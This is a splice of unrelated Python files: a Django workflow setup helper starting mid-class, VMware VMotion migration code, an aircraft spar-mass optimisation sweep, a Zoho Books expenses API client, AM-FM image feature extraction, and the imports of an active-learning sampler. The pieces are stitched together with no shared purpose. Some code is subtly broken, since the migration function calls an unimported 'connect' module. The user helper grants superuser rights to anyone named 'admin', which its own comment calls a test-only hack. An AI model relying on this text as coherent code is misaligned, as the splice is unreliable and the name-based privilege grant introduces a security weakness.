                     push_application=None, pushapp_param='',
                     application='', app_param='',
                     autostart=False, autofinish=True,
                     join_mode='and', split_mode='xor',
                     roles=None):
        '''
        creates a single activity instance

        ``roles`` defaults to None (instead of a shared mutable list) and is
        treated as an empty sequence when omitted.
        '''
        # Avoid the mutable-default-argument pitfall: normalize None here.
        roles = roles or ()
        activity = Activity(title=title,
                            description=description,
                            kind=kind,
                            process=self.process,
                            push_application=push_application,
                            pushapp_param=pushapp_param,
                            application=application,
                            app_param=repr(app_param),
                            autostart=autostart,
                            autofinish=autofinish,
                            join_mode=join_mode,
                            split_mode=split_mode
                            )
        log('activity', activity)
        activity.save()
        for role in roles:
            activity.roles.add(self.roles[role])
        activity.save()
        self.activities[title] = activity
        return activity

    def add_activities(self, activities):
        """Create many activities from tuples; see add_activity for fields."""
        _activities = []
        for title, kind, pushapp, app, autostart, autofinish, join, split, roles in activities:
            _activities.append(self.add_activity(
                title=title,
                kind=kind,
                push_application=self.add_pushapp(pushapp),
                application=self.add_application(url=self.applications[app]['url']),
                app_param=self.applications[app]['parameters'],
                autostart=autostart,
                autofinish=autofinish,
                join_mode=join,
                split_mode=split,
                roles=roles
            ))
        return _activities

    def add_transition(self, input_output=(None, None), name='', condition=''):
        """Create a Transition between two previously added activities."""
        input = self.activities[input_output[0]]
        output = self.activities[input_output[1]]
        t = Transition(name=name,
                       process=self.process,
                       input=input,
                       output=output,
                       condition=condition)
        log('transition', t)
        t.save()
        self.transitions[name] = t
        return t

    def add_transitions(self, transitions):
        """Create many transitions from (input_output, name, condition) tuples."""
        ts = []
        for input_output, name, condition in transitions:
            ts.append(self.add_transition(input_output, name, condition))
        return ts

    def create_process(self, title='', begin=None, end=None, description='',
                       enabled=True, priority=0):
        """Create and save the Process; begin/end are wired later in setup_all."""
        process = Process(title=title, description=description,
                          enabled=enabled, priority=priority)
        log('process', process)
        process.begin = begin
        process.end = end
        process.save()
        return process

    def create_process_role(self):
        """Create the Group for this process and grant it can_instantiate."""
        process_role = Group.objects.create(name=self.process.title)
        log('role|group', process_role)
        process_ctype = ContentType.objects.get_for_model(Process)
        can_instantiate_permission = Permission.objects.get(
            content_type=process_ctype, codename='can_instantiate')
        process_role.permissions.add(can_instantiate_permission)
        log('permission', can_instantiate_permission)
        return process_role

    def add_user(self, name, email, password, is_staff=True, is_active=True,
                 is_superuser=False, roles=None):
        '''
        This is the least generic, but that is deliberate to fully test
        everything.

        ``roles`` defaults to None (instead of a shared mutable list).
        '''
        user = User.objects.create_user(name, email, password)
        log('user', user)
        if is_staff:
            user.is_staff = True
        if is_active:
            user.is_active = True
        #TODO: this is just for testing and will/should be removed
        if name == 'admin':
            user.is_superuser = True
        if roles:
            for rolename in roles:
                role = Group.objects.get(name=rolename)
                user.groups.add(role)
                log('%s.role' % user.username, role)
        user.save()
        self.users[name] = user
        return user

    def add_users(self, users=None):
        """Create many users from (name, email, password, roles) tuples."""
        _users = []
        for name, email, password, roles in (users or []):
            _users.append(self.add_user(name=name, email=email,
                                        password=password, roles=roles))
        return _users

    def add_role(self, name, permissions):
        '''
        e.g. add_role('accountant', [('finance','BusinessPlan', 'can_review')])
        '''
        role, flag = Group.objects.get_or_create(name=name)
        log('role', role)
        for app_label, model_class_name, codename in permissions:
            # NOTE(review): django.db.models.get_model was removed in modern
            # Django (use django.apps.apps.get_model) — confirm target version.
            model_class = django.db.models.get_model(app_label, model_class_name)
            content_type = ContentType.objects.get_for_model(model_class)
            permission = Permission.objects.get(content_type=content_type,
                                                codename=codename)
            role.permissions.add(permission)
            log('%s.permission' % role.name, permission)
        role.save()
        self.roles[name] = role
        return role

    def add_roles(self, roles=None):
        """Create many roles from (name, permissions) tuples."""
        _roles = []
        for name, permissions in (roles or []):
            _roles.append(self.add_role(name, permissions))
        return _roles

    def setup_all(self):
        """Wire the configured start/end activities into the process and save."""
        self.process.begin = self.activities[self.start_activity]
        self.process.end = self.activities[self.end_activity]
        self.process.save()

    def as_graph(self, to=None):
        """Render the process as a graphviz digraph; write to file or return text."""
        from pygraphviz import AGraph
        g = AGraph(directed=True)
        for a in list(self.activities.values()):
            g.add_node(a.title, label=a.title)
        for t in list(self.transitions.values()):
            g.add_edge(t.input.title, t.output.title, label=t.name)
        if to:
            g.write(to)
        else:
            return str(g)
## @file vmotion.py
## @brief VMotion operations
##
## Detailed description (for Doxygen goes here)

"""
VMotion operations

Detailed description (for [e]pydoc goes here)
"""

import os
from pyVmomi import Vim
from pyVmomi import Vmodl
from pyVmomi import vmodl
from pyVim.task import WaitForTask
from pyVim.helpers import Log
from pyVim import path
from . import host
import time
from .invt import *
from six import PY3
if PY3:
    long = int

gSupportedVmotionTypes = ['vmotion', 'fault_tolerance', 'disks_only']


##
# Returns list of VMotion types supported by this module
##
def GetSupportedVMotionTypes():
    return gSupportedVmotionTypes


##
# Given a datastore name, looks up the corresponding datastore URL
#
# @param si [in] Service instance to use
# @param dsName [in] datastore name to lookup
##
def GetDsUrl(si, dsName):
    if dsName is None:
        raise Exception("No target datastore specified for storage VMotion!")
    dsList = host.GetHostSystem(si).datastore
    dsUrl = [ds.info.url for ds in dsList if ds.name == dsName]
    if not dsUrl:
        raise Exception("Target datastore %s doesn't exist" % dsName)
    return dsUrl[0]


##
# Given a target directory name and a source disk file path, generate the
# target file path.
#
# @param targetDir [in] Target directory name
# @param diskFilePath [in] disk file path from the backing information
##
def GetTargetFileName(targetDir, diskFilePath):
    # Keep only the basename of the source disk and place it under targetDir.
    diskName = diskFilePath[diskFilePath.rfind('/') + 1:]
    return targetDir + '/' + diskName


##
# Create disk specs needed for storage & disk only vmotions
#
# @param vm1 [in] VM instance to migrate
# @param targetVmDir [in] Target directory to copy disks into
#
##
def CreateDiskSpecs(vm1, targetVmDir):
    if vm1.config is None:
        raise Exception("No config information found for VM")
    diskSpecs = []
    # Map controller key -> controller device for bus-number lookup below.
    ctlrMap = dict([
        (dev.key, dev) for dev in vm1.config.hardware.device
        if issubclass(dev.__class__, Vim.Vm.Device.VirtualController)
    ])
    for dev in vm1.config.hardware.device:
        if issubclass(dev.__class__, Vim.Vm.Device.VirtualDisk) and \
           issubclass(dev.backing.__class__,
                      Vim.Vm.Device.VirtualDevice.FileBackingInfo):
            spec = Vim.Host.VMotionManager.ReparentSpec()
            spec.SetUnitNumber(dev.unitNumber)
            #spec.SetDiskBackingInfo(dev.backing)
            spec.SetFilename(
                GetTargetFileName(path.DsPathToFsPath(targetVmDir),
                                  dev.backing.fileName))
            if dev.backing.parent:
                spec.SetParentFilename(
                    path.DsPathToFsPath(dev.backing.parent.fileName))
            ctlr = ctlrMap[dev.controllerKey]
            spec.SetBusNumber(ctlr.busNumber)
            spec.SetControllerType(ctlr.__class__)
            diskSpecs.append(spec)
    if len(diskSpecs) == 0:
        Log("Devices: %s" % vm1.config.hardware.device)
    return diskSpecs


##
## Helper routine that retrieves the local config file path of a VM
##
## @param vm1 [in] The VM whose config file path is to be retrieved
## @param dsPath [in] If specified, this datastore path overrides the VM's cfg file path
## @param dsUrl [in] If specified, this datastore url overrides the VM's cfg file path
##
def GetLocalCfgPath(vm1, dsPath=None, dsUrl=None):
    if dsPath is None:
        dsPath = vm1.config.files.vmPathName
    dsName = dsPath[dsPath.index("[") + 1:dsPath.rindex("]")]
    if dsName == "":
        # Path had an empty "[]" datastore prefix; it is already absolute.
        return dsPath[dsPath.index("/"):]
    if dsUrl is None:
        datastore = [ds for ds in vm1.datastore if ds.name == dsName][0]
        dsUrl = datastore.GetInfo().GetUrl()
    relVmPath = dsPath[dsPath.rindex("]") + 2:]
    return dsUrl + "/" + relVmPath


## VMotion the VM through Hostd
#
# @param srcVm [in] The VM to be migrated
# @param srcSi [in] ServiceInstance corresponding to the source host
# @param dstSi [in] ServiceInstance corresponding to the dst host
# @param dstPath [in] The config file path of the destination VM.
# @param unsharedSwap [in] VMotion parameter for sharing the swap file
# @param vmotionType [in] The type of VMotion requested
# @param encrypt [in] Whether to use encryption for this VMotion
# @param destDs [in] Destination datatore required for storage vmotions
##
def Migrate(srcVm,
            srcSi,
            dstSi,
            dstPath=None,
            unsharedSwap=False,
            vmotionType=Vim.Host.VMotionManager.VMotionType.vmotion,
            destDs=None,
            ftType=None,
            destVm=None):
    fileMgr = srcSi.content.fileManager
    dirCreated = False
    VMotionType = Vim.Host.VMotionManager.VMotionType
    if srcVm.GetRuntime().GetPowerState(
    ) != Vim.VirtualMachine.PowerState.poweredOn:
        raise Exception("VM not powered on. Cannot VMotion.")
    if vmotionType not in gSupportedVmotionTypes:
        raise Exception("Unsupported VMotion type '%s'" % vmotionType)

    # Create the VMotion spec
    spec = Vim.Host.VMotionManager.Spec()
    migrationId = long(time.time())
    if dstPath is None:
        dstPath = srcVm.GetConfig().GetFiles().GetVmPathName()
    dsUrl = None
    srcVmotionIp = host.GetVMotionIP(srcSi)
    Log("Getting source VMotion IP " + srcVmotionIp)
    spec.SetSrcIp(srcVmotionIp)
    dstVmotionIp = host.GetVMotionIP(dstSi)
    Log("Getting destination VMotion IP " + dstVmotionIp)
    spec.SetDstIp(dstVmotionIp)
    spec.SetType(vmotionType)
    if ftType:
        spec.SetFaultToleranceType(ftType)
    spec.dstVmDirPath, spec.dstVmFileName = os.path.split(dstPath)
    spec.srcVmPathName = srcVm.GetConfig().GetFiles().GetVmPathName()

    # Specify FT logging nic information for FT VMs
    if srcVm.GetRuntime().GetFaultToleranceState(
    ) != Vim.VirtualMachine.FaultToleranceState.notConfigured:
        srcLoggingIp = host.GetLoggingIP(srcSi)
        Log("Getting source Logging IP " + srcLoggingIp)
        spec.SetSrcLoggingIp(srcLoggingIp)
        dstLoggingIp = host.GetLoggingIP(dstSi)
        Log("Getting destination Logging IP " + dstLoggingIp)
        spec.SetDstLoggingIp(dstLoggingIp)

    # Generate disk specs for disk migrations
    if vmotionType == VMotionType.disks_only:
        dsUrl = GetDsUrl(srcSi, destDs)
        targetVmDir = dsUrl + '/' + srcVm.name
        Log("Creating target VM directory %s" % targetVmDir)
        try:
            fileMgr.MakeDirectory("[] " + targetVmDir)
            dirCreated = True
        except Vim.Fault.FileAlreadyExists as e:
            Log("File already exists")
        Log("Creating disk relocation specs")
        spec.SetDiskLocations(CreateDiskSpecs(srcVm, targetVmDir))
    elif vmotionType == VMotionType.fault_tolerance and \
            spec.GetFaultToleranceType() == "fault_tolerance_using_checkpoints":
        if not destDs:
            targetVmDir = destVm.config.files.suspendDirectory
            for url in destVm.config.datastoreUrl:
                # BUGFIX: str.replace returns a new string; the original code
                # discarded the result, so the "[dsName] " prefix was never
                # rewritten to the datastore URL.
                targetVmDir = targetVmDir.replace("[%s] " % url.name, url.url)
        else:
            dsUrl = GetDsUrl(dstSi, destDs)
            targetVmDir = dsUrl + '/' + destVm.name
        Log("Creating disk relocation specs for %s" % targetVmDir)
        spec.SetDiskLocations(CreateDiskSpecs(destVm, targetVmDir))

    Log("Getting source UUID")
    spec.SetSrcUuid(host.GetHostUuid(srcSi))
    Log("Getting destination UUID")
    spec.SetDstUuid(host.GetHostUuid(dstSi))
    spec.SetPriority(Vim.VirtualMachine.MovePriority.defaultPriority)
    spec.SetUnsharedSwap(unsharedSwap)
    spec.SetMigrationId(migrationId)
    srcMgr = host.GetVmotionManager(srcSi)
    dstMgr = host.GetVmotionManager(dstSi)
    try:
        # Prepare the VMotion operation
        Log("Preparing source")
        connect.SetSi(srcSi)
        print(spec)
        prepareSrcTask = srcMgr.PrepareSourceEx(spec, srcVm)
        WaitForTask(prepareSrcTask)
        if vmotionType != VMotionType.disks_only:
            Log("Preparing destination")
            connect.SetSi(dstSi)
            resPool = host.GetRootResourcePool(dstSi)
            prepareDstTask = dstMgr.PrepareDestinationEx(spec, resPool)
            WaitForTask(prepareDstTask)

        # Initiate the VMotion operation
        if vmotionType != VMotionType.disks_only:
            if destVm is not None:
                localPath = GetLocalCfgPath(destVm, dstPath, dsUrl)
            else:
                localPath = GetLocalCfgPath(srcVm, dstPath, dsUrl)
            Log("Initiating destination with path " + localPath)
            dstState = dstMgr.InitiateDestination(migrationId, localPath)
            dstId = dstState.GetDstId()
            dstTask = dstState.GetDstTask()
        else:
            dstId = 0
        Log("Initiating source")
        connect.SetSi(srcSi)
        srcTask = srcMgr.InitiateSourceEx(migrationId, dstId)
        Log("Waiting for completion")
        try:
            if vmotionType != VMotionType.disks_only:
                WaitForTask(dstTask, si=dstSi)
            WaitForTask(srcTask, si=srcSi)
        except Vmodl.Fault.ManagedObjectNotFound as e:
            Log("Task no longer present.")
        Log("VMotion succeeded.")
    # InitiateSourceEx/Destination throw InvalidArgument
    # when a vmotion starts with an already used migrationID
    # that means if we call CompleteSource/CompleteDestination
    # we will cancel the first vmotion with that id
    except vmodl.fault.InvalidArgument as e:
        if dirCreated:
            try:
                Log("Cleaning up directory")
                fileMgr.deleteFile("[] " + targetVmDir)
            except Exception as e:
                Log("Caught exception %s while deletion directory" % e)
        Log("VMotion failed. Got exception " + str(e))
        raise
    except Exception as e:
        # Complete the VMotion operation
        Log("Completing source")
        srcMgr.CompleteSource(migrationId)
        if vmotionType != VMotionType.disks_only:
            Log("Completing destination")
            dstMgr.CompleteDestination(migrationId)
        if dirCreated:
            try:
                Log("Cleaning up directory")
                fileMgr.deleteFile("[] " + targetVmDir)
            except Exception as e:
                Log("Caught exception %s while deletion directory" % e)
        Log("VMotion failed. Got exception " + str(e))
        raise

    # Complete the VMotion operation
    Log("Completing source")
    srcMgr.CompleteSource(migrationId)
    if vmotionType != VMotionType.disks_only:
        Log("Completing destination")
        dstMgr.CompleteDestination(migrationId)
<filename>studies/MultiBoomSparMass_v2/sweep.py
"""
This script generates data used to estimate spar mass as a function of lift force (i.e. total weight) and span.
"""

### Imports
from aerosandbox.structures.beams import *
import copy

### Set up sweep variables
# n_booms = 1
# n_booms = 2
# load_location_fraction = 0.50

n_booms = 3
load_location_fraction = 0.60

# Log-spaced grid of (total mass, span) points to sweep over.
res = 15
masses = np.logspace(np.log10(5), np.log10(3000), res)
spans = np.logspace(np.log10(3), np.log10(120), res)
Masses, Spans = np.meshgrid(masses, spans, indexing="ij")
Spar_Masses = np.zeros_like(Masses)

### Set up problem
# mass and span are CasADi parameters so the same compiled problem can be
# re-solved for every grid point without rebuilding it.
opti = cas.Opti()
mass = opti.parameter()
span = opti.parameter()

# Half-span beam model (symmetry about the root).
beam = TubeBeam1(
    opti=opti,
    length=span / 2,
    points_per_point_load=100,
    diameter_guess=10,
    thickness=0.60e-3,
    bending=True,
    torsion=False
)
lift_force = 9.81 * mass

# load_location = opti.variable()
# opti.set_initial(load_location, 12)
# opti.subject_to([
#     load_location > 1,
#     load_location < beam.length - 1,
# ])
assert (n_booms == np.array([1, 2, 3])).any()
if n_booms == 2 or n_booms == 3:
    # Outboard boom modeled as a downward point load on the half-span beam.
    load_location = beam.length * load_location_fraction
    beam.add_point_load(location=load_location, force=-lift_force / n_booms)
beam.add_elliptical_load(force=lift_force / 2)
beam.setup()

# Constraints (in addition to stress)
opti.subject_to([
    # beam.u[-1] < 2,  # tip deflection. Source: http://web.mit.edu/drela/Public/web/hpa/hpa_structure.pdf
    # beam.u[-1] > -2  # tip deflection. Source: http://web.mit.edu/drela/Public/web/hpa/hpa_structure.pdf
    beam.du * 180 / cas.pi < 10,  # local dihedral constraint
    beam.du * 180 / cas.pi > -10,  # local anhedral constraint
    cas.diff(beam.nominal_diameter) < 0,  # manufacturability
])

# # Zero-curvature constraint (restrict to conical tube spars only)
# opti.subject_to([
#     cas.diff(cas.diff(beam.nominal_diameter)) == 0
# ])

opti.minimize(beam.mass)

p_opts = {}
s_opts = {}
# NOTE(review): ipopt expects an integer here; 1e6 is a float — confirm the
# CasADi option layer coerces it.
s_opts["max_iter"] = 1e6  # If you need to interrupt, just use ctrl+c
# s_opts["mu_strategy"] = "adaptive"
opti.solver('ipopt', p_opts, s_opts)

### Do the sweep
for i in range(len(masses)):
    # Serpentine order so each solve warm-starts from a neighboring solution.
    iterable = range(len(spans))
    iterable = iterable[::-1] if i % 2 != 0 else iterable
    for j in iterable:
        opti.set_value(mass, Masses[i, j])
        opti.set_value(span, Spans[i, j])
        sol = opti.solve()
        opti.set_initial(sol.value_variables())
        beam_sol = copy.deepcopy(beam).substitute_solution(sol)
        # Factor of 2: beam models the half-span only.
        Spar_Masses[i, j] = beam_sol.mass * 2

np.save("masses", Masses)
np.save("spans", Spans)
np.save("spar_masses", Spar_Masses)

# Run a sanity check
beam_sol.draw_bending()

from fit import *
#$Id$#

from books.util.ZohoHttpClient import ZohoHttpClient
from books.parser.ExpensesParser import ExpensesParser
from os.path import basename
from books.api.Api import Api
from json import dumps

base_url = Api().base_url + 'expenses/'
parser = ExpensesParser()
zoho_http_client = ZohoHttpClient()


def _build_receipt_attachment(receipt):
    """Build the attachment payload for a receipt file.

    BUGFIX: the file is read in binary mode — receipts are typically binary
    formats (png, jpeg, pdf, ...) and a text-mode read raises
    UnicodeDecodeError on Python 3. The context manager also closes the
    handle promptly instead of leaking it.

    Args:
        receipt(str): Path of the receipt file.

    Returns:
        list: Single-element attachment list for ZohoHttpClient.
    """
    with open(receipt, 'rb') as receipt_file:
        content = receipt_file.read()
    return [{
        'receipt': {
            'filename': basename(receipt),
            'content': content
        }
    }]


class ExpensesApi:
    """Expenses Api is used to:

    1.List expenses with pagination.
    2.Get the details of an expense.
    3.Create a billable or non-billable expense.
    4.Update an existing expense.
    5.Delete an expense.
    6.Get history and comments of an expense.
    7.Returns the receipt attached to an expense.
    8.Attach a receipt to an expense.
    9.Delete the receipt attached to the expense.

    """

    def __init__(self, authtoken, organization_id):
        """Initialize Expenses Api using user's authtoken and organization id.

        Args:
            authtoken(str): User's Authtoken.
            organization_id(str): User's organization id.

        """
        self.headers = {
            'Authorization': 'Zoho-oauthtoken ' + authtoken,
        }
        self.details = {
            'organization_id': organization_id
        }

    def get_expenses(self, parameter=None):
        """List expenses with pagination.

        Args:
            parameter(dict, optional): Filter with which expenses list has to
                be displayed. Defaults to None.

        Returns:
            instance: Expenses list object.

        """
        resp = zoho_http_client.get(base_url, self.details, self.headers,
                                    parameter)
        return parser.get_list(resp)

    def get(self, expense_id):
        """Get details of an expense.

        Args:
            expense_id(str): Expense id.

        Returns:
            instance: Expense object.

        """
        url = base_url + expense_id
        resp = zoho_http_client.get(url, self.details, self.headers)
        return parser.get_expense(resp)

    def create(self, expense, receipt=None):
        """Create an expense.

        Args:
            expense(instance): Expense object.
            receipt(file, optional): Expense receipt file to attach. Allowed
                Extensions: gif, png, jpeg, jpg, bmp and pdf.

        Returns:
            instance: Expense object.

        """
        json_object = dumps(expense.to_json())
        data = {
            'JSONString': json_object
        }
        if receipt is None:
            attachments = None
        else:
            attachments = _build_receipt_attachment(receipt)
        resp = zoho_http_client.post(base_url, self.details, self.headers,
                                     data, None, attachments)
        return parser.get_expense(resp)

    def update(self, expense_id, expense, receipt=None):
        """Update an existing expense.

        Args:
            expense_id(str): Expense id.
            expense(instance): Expense object.
            receipt(file): Expense receipt file to attach. Allowed
                Extensions: gif, png, jpeg, jpg, bmp and pdf.

        Returns:
            instance: Expense object.

        """
        url = base_url + expense_id
        json_object = dumps(expense.to_json())
        data = {
            'JSONString': json_object
        }
        if receipt is None:
            attachments = None
        else:
            attachments = _build_receipt_attachment(receipt)
        resp = zoho_http_client.put(url, self.details, self.headers, data,
                                    None, attachments)
        return parser.get_expense(resp)

    def delete(self, expense_id):
        """Delete an existing expense.

        Args:
            expense_id(str): Expense id.

        Returns:
            str: Success message('The expense has been deleted.').

        """
        url = base_url + expense_id
        resp = zoho_http_client.delete(url, self.details, self.headers)
        return parser.get_message(resp)

    def list_comments_history(self, expense_id):
        """Get history and comments of an expense.

        Args:
            expense_id(str): Expense id.

        Returns:
            instance: comments list object.

        """
        url = base_url + expense_id + '/comments'
        resp = zoho_http_client.get(url, self.details, self.headers)
        return parser.get_comments(resp)

    def get_receipt(self, expense_id, preview=None):
        """Get the receipt attached to an expense.

        Args:
            expense_id(str): Expense id.
            preview(bool, optional): True to get the thumbnail of the receipt.

        Returns:
            file: Returns the receipt attached to the expense.

        """
        url = base_url + expense_id + '/receipt'
        if preview is not None:
            query = {
                'preview': preview
            }
        else:
            query = None
        resp = zoho_http_client.getfile(url, self.details, self.headers, query)
        return resp

    def add_receipt(self, expense_id, receipt):
        """Attach a receipt to an expense.

        Args:
            expense_id(str): Expense id.
            receipt(file): Receipt to be attached. Allowed Extensions: gif,
                png, jpeg, jpg, bmp, pdf, xls, xlsx, doc and docx.

        Returns:
            str: Success message('The expense receipt has been attached.').

        """
        url = base_url + expense_id + '/receipt'
        attachments = _build_receipt_attachment(receipt)
        data = {
            'JSONString': ''
        }
        resp = zoho_http_client.post(url, self.details, self.headers, data,
                                     None, attachments)
        return parser.get_message(resp)

    def delete_receipt(self, expense_id):
        """Delete the receipt attached to the expense.

        Args:
            expense_id(str): Expense id.

        Returns:
            str: Success message('The attached expense receipt has been
                deleted.').

        """
        url = base_url + expense_id + '/receipt'
        resp = zoho_http_client.delete(url, self.details, self.headers)
        return parser.get_message(resp)
# -*- coding: utf-8 -*-
"""
==============================================================================
@author: <NAME>
@author: <NAME>,
@author: <NAME>
@author: <NAME>
@reference: Murray, An AM-FM model for Motion Estimation in Atherosclerotic
            Plaque Videos
            Murray, Multiscale AMFM Demodulation and Image Reconstruction
            methods with Improved Accuracy
            Pattichis, Medical Image Analysis Using AM-FM Models and Methods
==============================================================================
"""
import numpy as np
from scipy import signal
import warnings


def _gabor_kernel_2D(theta, lamda, gamma, bandwidth, phase, overlapIndex):
    """Build one real 2-D Gabor kernel, normalized in the frequency domain.

    Returns:
        result (ndarray): the kernel.
        sigma (float): the Gaussian envelope's sigma (reused by the caller).
    """
    qFactor = (1/np.pi) * np.sqrt((np.log(overlapIndex)/2)) * \
              ((2**bandwidth + 1) / (2**bandwidth - 1))
    sigma = lamda*qFactor
    n = np.ceil(4*sigma)
    [x, y] = np.mgrid[-n:(n+2), -n:(n+2)]
    # Rotate coordinates by theta.
    xTheta = x * np.cos(theta) + y * np.sin(theta)
    yTheta = -x * np.sin(theta) + y * np.cos(theta)
    gaussian = np.exp(-((xTheta**2) + gamma**2. * (yTheta**2))/(2*sigma**2))
    res = gaussian * np.cos(2*np.pi*xTheta/lamda + phase)
    # Normalize so the kernel's peak frequency response has magnitude 1.
    maxFft = abs(np.fft.fft2(res)).max()
    normalize = np.fft.fft2(res)/maxFft
    result = np.real(np.fft.ifft2(normalize))
    return result, sigma


def _gaussian_function(f0, s0, overlapIndex):
    """Build the (unit-sum) Gaussian low-pass kernel used as the DC filter."""
    over = np.sqrt(2*np.log(1/overlapIndex))
    sigma = s0*over/(s0*f0 - over)
    n = np.ceil(2*sigma)
    [x, y] = np.mgrid[-n:(n+2), -n:(n+2)]
    res = np.exp(-1/2*(x**2 + y**2)/sigma**2)
    res = res / res.sum()
    return res


def _filterbank():
    '''
    Returns
    -------
    filters : list
        List of 41 filters (5 scales x 8 orientations + 1 DC low-pass)
        for AM-FM multi-scale analysis.
    '''
    lamda0 = 2
    orientations = 8
    scales = 5
    gamma = 1
    phase = 0
    bandwidth = 1
    overlapIndex = 0.5
    offset = 0

    theta = np.arange(offset,
                      np.pi - np.pi/orientations + offset + np.pi/orientations,
                      (np.pi/orientations))
    lamda = lamda0
    filters = []
    for sc_index in range(scales, 0, -1):
        lamda0 = lamda
        for th in range(theta.shape[0]):
            result, sig = _gabor_kernel_2D(theta[th], lamda, gamma,
                                           bandwidth, phase, 1/overlapIndex)
            filters.append(result)
        # Next (coarser) scale: double the wavelength.
        lamda = lamda0 * 2**bandwidth

    # Add DC Filter (sig is the sigma of the last/coarsest Gabor kernel).
    f1 = 2*np.pi/lamda
    result = _gaussian_function(f1, sig, overlapIndex)
    filters.append(result)

    return filters


def _calculate_amfm(f):
    '''
    AM-FM demodulation of one band-passed (complex) image.

    Parameters
    ----------
    f : numpy ndarray
        Image of dimensions N1 x N2.

    Returns
    -------
    IA : numpy ndarray
        instantaneous amplitude (a_n).
    IP : numpy ndarray
        instanteneous phase (phi_n).
    IFx : numpy ndarray
        instantanteous frequency (grad phi1_n).
    IFy : numpy ndarray
        instantanteous frequency (grad phi2_n).
    '''
    IA = np.abs(f)
    IP = np.angle(f)
    IANorm = np.divide(f, IA+1e-16)
    IFx = np.zeros(f.shape, np.double)
    IFy = np.zeros(f.shape, np.double)
    # Vectorized central-difference frequency estimate on the interior
    # (borders stay zero, exactly as the original per-pixel double loop did).
    if f.shape[0] > 2 and f.shape[1] > 2:
        core = IANorm[1:-1, 1:-1]
        IFx[1:-1, 1:-1] = np.abs(np.arccos(np.real(
            (IANorm[2:, 1:-1] + IANorm[:-2, 1:-1]) / (2*core))))
        IFy[1:-1, 1:-1] = np.abs(np.arccos(np.real(
            (IANorm[1:-1, 2:] + IANorm[1:-1, :-2]) / (2*core))))
    return IA, IP, IFx, IFy


def _dca(band):
    '''
    Dominant Component Analysis: per pixel, keep the component of the band
    with the largest instantaneous amplitude.

    Parameters
    ----------
    band : list
        The band. A list of [IA, IP, IFx, IFy] quadruples.

    Returns
    -------
    IA : numpy ndarray
        Max instantaneous amplitude for given band.
    IP : numpy ndarray
        Phase of the dominant component for given band.
    IFx : numpy ndarray
        x-frequency of the dominant component for given band.
    IFy : numpy ndarray
        y-frequency of the dominant component for given band.
    '''
    IA = np.zeros(band[0][0].shape)
    IP = np.zeros(band[0][1].shape)
    IFx = np.zeros(band[0][2].shape)
    IFy = np.zeros(band[0][3].shape)
    w, h = band[0][0].shape
    for i in range(w):
        for j in range(h):
            pos = 0
            temp = band[pos][0][i, j]   # band[pos].IA[i,j]
            for l in range(len(band)):
                if temp < band[l][0][i, j]:   # band[l].IA[i,j]
                    pos = l
                    temp = band[l][0][i, j]
            IA[i, j] = temp
            IP[i, j] = band[pos][1][i, j]
            IFx[i, j] = band[pos][2][i, j]
            IFy[i, j] = band[pos][3][i, j]
    return IA, IP, IFx, IFy


def amfm_features(f, bins=32):
    '''
    Multi-scale AM-FM features: histograms of the DCA reconstructions of the
    low, medium, high and DC frequency bands.

    Parameters
    ----------
    f : numpy ndarray
        Image of dimensions N1 x N2.
    bins: int, optional
        Bins for the calculated histogram. The default is 32.

    Returns
    -------
    features : numpy ndarray
        Histogram of IA, IP, IFx, IFy as a concatenated vector
        (4 * bins values).
    labels : list
        Labels of features.
    '''
    warnings.simplefilter(action='ignore', category=RuntimeWarning)

    AMFM = []
    filters = _filterbank()
    f_hilbert = signal.hilbert(f)

    #mask_c = _image_xor(mask)
    #mask_conv = []
    #for filtre in filters:
    #    oneskernel = np.ones(filtre.shape)
    #    temp = signal.convolve2d(mask_c, oneskernel,'same')
    #    temp = np.abs(np.sign(temp)-1)
    #    mask_conv.append(temp)

    for i, filtre in enumerate(filters):
        f_filtered = signal.convolve2d(f_hilbert, np.rot90(filtre),
                                       mode='same', boundary='fill',
                                       fillvalue=0)
        #f_filtered = f_filtered * mask_conv[i]
        IA, IP, IFx, IFy = _calculate_amfm(f_filtered)
        IA = np.nan_to_num(IA)
        IP = np.nan_to_num(IP)
        IFx = np.nan_to_num(IFx)
        IFy = np.nan_to_num(IFy)
        AMFM.append([IA, IP, IFx, IFy])
        # Access like this: band[i][0] for IA, band[i][1] for IP,
        # band[i][2] for IFx and band[i][3] for IFy

    # Split the 41 filter responses into frequency bands (8 per orientation
    # group, finest scale first, DC last).
    high = []
    med = []
    low = []
    dc = []
    for i in range(len(filters)):
        if (i <= 7):
            high.append(AMFM[i])
        elif (i <= 23):
            med.append(AMFM[i])
        elif (i <= 39):
            low.append(AMFM[i])
        else:
            dc.append(AMFM[i])

    # For each band: keep only amplitudes above that band's own median, then
    # reconstruct and histogram.
    # BUGFIX: the original thresholded the med/high bands with
    # np.percentile(IAl, 50) — i.e. the (already thresholded) *low* band's
    # median — which is a copy-paste error; each band now uses its own median.
    IAl, IPl, IFxl, IFyl = _dca(low)
    IAl = (IAl > np.percentile(IAl, 50)).astype(np.float64) * IAl
    reconstructionImgDCAl = np.real(IAl * np.cos(IPl))
    H1 = np.histogram(reconstructionImgDCAl, bins=bins, density=True)[0]

    IAm, IPm, IFxm, IFym = _dca(med)
    IAm = (IAm > np.percentile(IAm, 50)).astype(np.float64) * IAm
    reconstructionImgDCAm = np.real(IAm * np.cos(IPm))
    H2 = np.histogram(reconstructionImgDCAm, bins=bins, density=True)[0]

    IAh, IPh, IFxh, IFyh = _dca(high)
    IAh = (IAh > np.percentile(IAh, 50)).astype(np.float64) * IAh
    reconstructionImgDCAh = np.real(IAh * np.cos(IPh))
    H3 = np.histogram(reconstructionImgDCAh, bins=bins, density=True)[0]

    IAdc, IPdc, IFxdc, IFydc = _dca(dc)
    reconstructionImgDCAdc = np.real(IAdc * np.cos(IPdc))
    H4 = np.histogram(reconstructionImgDCAdc, bins=bins, density=True)[0]

    features = np.concatenate([H1, H2, H3, H4])
    # BUGFIX: label count now follows the `bins` parameter instead of a
    # hardcoded 32, so len(labels) == len(features) for any bins value.
    labels = []
    labels.append(['AMFM_low' + str(i) for i in range(bins)])
    labels.append(['AMFM_med' + str(i) for i in range(bins)])
    labels.append(['AMFM_high' + str(i) for i in range(bins)])
    labels.append(['AMFM_dc' + str(i) for i in range(bins)])
    labels = [item for sublist in labels for item in sublist]

    warnings.simplefilter(action='default', category=RuntimeWarning)

    return features, labels


def plotAMFM(f):
    pass
<reponame>tech-sketch/SeqAL
import math
import random
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

import numpy as np
import torch
from flair.data import Sentence
from sklearn.base import BaseEstimator
from sklearn.cluster import KMeans
from sklearn.preprocessing import MinMaxScaler

from seqal.data import Entities, Entity
from seqal.tagger import SequenceTagger

from .base import BaseSampler


